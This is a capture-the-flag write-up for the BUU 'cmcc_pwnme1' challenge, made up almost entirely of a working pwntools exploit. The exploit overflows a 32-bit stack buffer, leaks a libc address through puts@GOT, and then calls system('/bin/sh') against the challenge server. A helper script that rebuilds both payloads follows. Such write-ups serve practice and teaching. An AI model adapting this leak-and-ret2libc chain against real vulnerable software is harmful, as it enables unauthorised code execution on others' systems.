BUU-cmcc_pwnme1-WP

Posted on Jan 12, 2021

Glad to have this one done. It's a trivial stack overflow challenge, nothing much to say, so straight to the exploit.

#!/usr/bin/env python3
# coding=utf-8
from pwn import *

sh = remote("node3.buuoj.cn", 29136)
elf = ELF("./pwnme1")
libc = ELF("./libcs/buu-32-libc.so")

# pop ebp ; ret gadget: pops the single argument of puts off the stack before returning to main
pop_ebp_ret = 0x80485f3
# 0xA4 bytes fill the buffer, 4 bytes overwrite saved ebp, then the return address
# Stage 1: puts(puts@got) leaks a libc address, then return to main for a second overflow
payload = b'a' * 0xA4 + b'b' * 0x4 + p32(elf.symbols["puts"]) + p32(pop_ebp_ret) + p32(elf.got["puts"])
payload += p32(0x8048570)  # back to main

sh.sendlineafter(b"Exit    \n", b'5')
sh.sendlineafter(b"fruit:", payload)
sh.recvuntil(b"..\n")
puts_addr = u32(sh.recv(4))
base = puts_addr - libc.symbols["puts"]
print(hex(base))

# Stage 2: ret2libc system("/bin/sh"); the 4 bytes after system are its (never used) return address
payload = b'a' * 0xA4 + b'b' * 0x4 + p32(base + libc.symbols["system"]) + b'a' * 4 + p32(base + next(libc.search(b"/bin/sh")))
sh.sendlineafter(b"Exit    \n", b'5')
sh.sendlineafter(b"fruit:", payload)

sh.interactive()

The challenge ships a backdoor, but it can't be used on BUU, so we just leak libc the honest way.
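To make the two-stage chain above easier to reason about offline, here is an added example (my own code, not part of the original writeup) that builds both payloads with plain struct packing and adds the one sanity check worth having on a remote leak: a libc base must be page aligned, so a misaligned result means the 4 bytes were read from the wrong spot or the wrong libc was chosen. The padding, gadget and return-to-main addresses are the ones from the script above; the puts@plt, puts@got and libc symbol offsets used in the usage call are constructed placeholders, not values from the challenge binary.

```python
import struct

# From the writeup's exploit: 0xA4 bytes of buffer plus 4 bytes of saved ebp
PAD = 0xA4 + 0x4
# pop ebp ; ret gadget and the address of main, both fixed (no PIE) in the binary
POP_EBP_RET = 0x80485f3
RET_TO_MAIN = 0x8048570


def p32(x):
    """Pack a 32-bit little-endian value (stand-in for pwntools p32)."""
    return struct.pack("<I", x & 0xffffffff)


def u32(b):
    """Unpack 4 little-endian bytes (stand-in for pwntools u32)."""
    return struct.unpack("<I", b[:4])[0]


def leak_chain(puts_plt, puts_got, pop_ret=POP_EBP_RET, ret_to=RET_TO_MAIN):
    """Stage 1: puts(puts@got). On i386 the caller cleans the stack, so after
    puts returns into the gadget, 'pop ebp' discards puts_got and 'ret' lands
    in main, giving us a second overflow once libc is known."""
    return b"a" * PAD + p32(puts_plt) + p32(pop_ret) + p32(puts_got) + p32(ret_to)


def libc_base_from_leak(raw, puts_offset):
    """Turn the 4 leaked bytes into a libc base, rejecting non page-aligned
    results (a sign of reading the leak from the wrong position or using the
    wrong libc build)."""
    base = u32(raw) - puts_offset
    if base & 0xfff:
        raise ValueError("libc base 0x%x is not page aligned: wrong leak or wrong libc" % base)
    return base


def system_chain(base, system_offset, binsh_offset):
    """Stage 2: system("/bin/sh"). The 4 bytes after system are its return
    address, which never matters because we never come back."""
    return b"a" * PAD + p32(base + system_offset) + b"a" * 4 + p32(base + binsh_offset)


if __name__ == "__main__":
    # Constructed placeholder addresses, not taken from the challenge binary or libc
    stage1 = leak_chain(puts_plt=0x8048460, puts_got=0x804a01c)
    leaked = p32(0xf7d5f140)          # pretend the remote printed this address
    base = libc_base_from_leak(leaked, puts_offset=0x5f140)
    stage2 = system_chain(base, system_offset=0x3a940, binsh_offset=0x15902b)
    print(hex(base), len(stage1), len(stage2))
```

In the real exploit the same check belongs right after `u32(sh.recv(4))`: a BUU libc that does not match the server's will still give a page-aligned base, but a leak read one byte off (for example when the banner before the address is not exactly the bytes you waited for) will not, and failing fast there saves a confusing crash in stage 2.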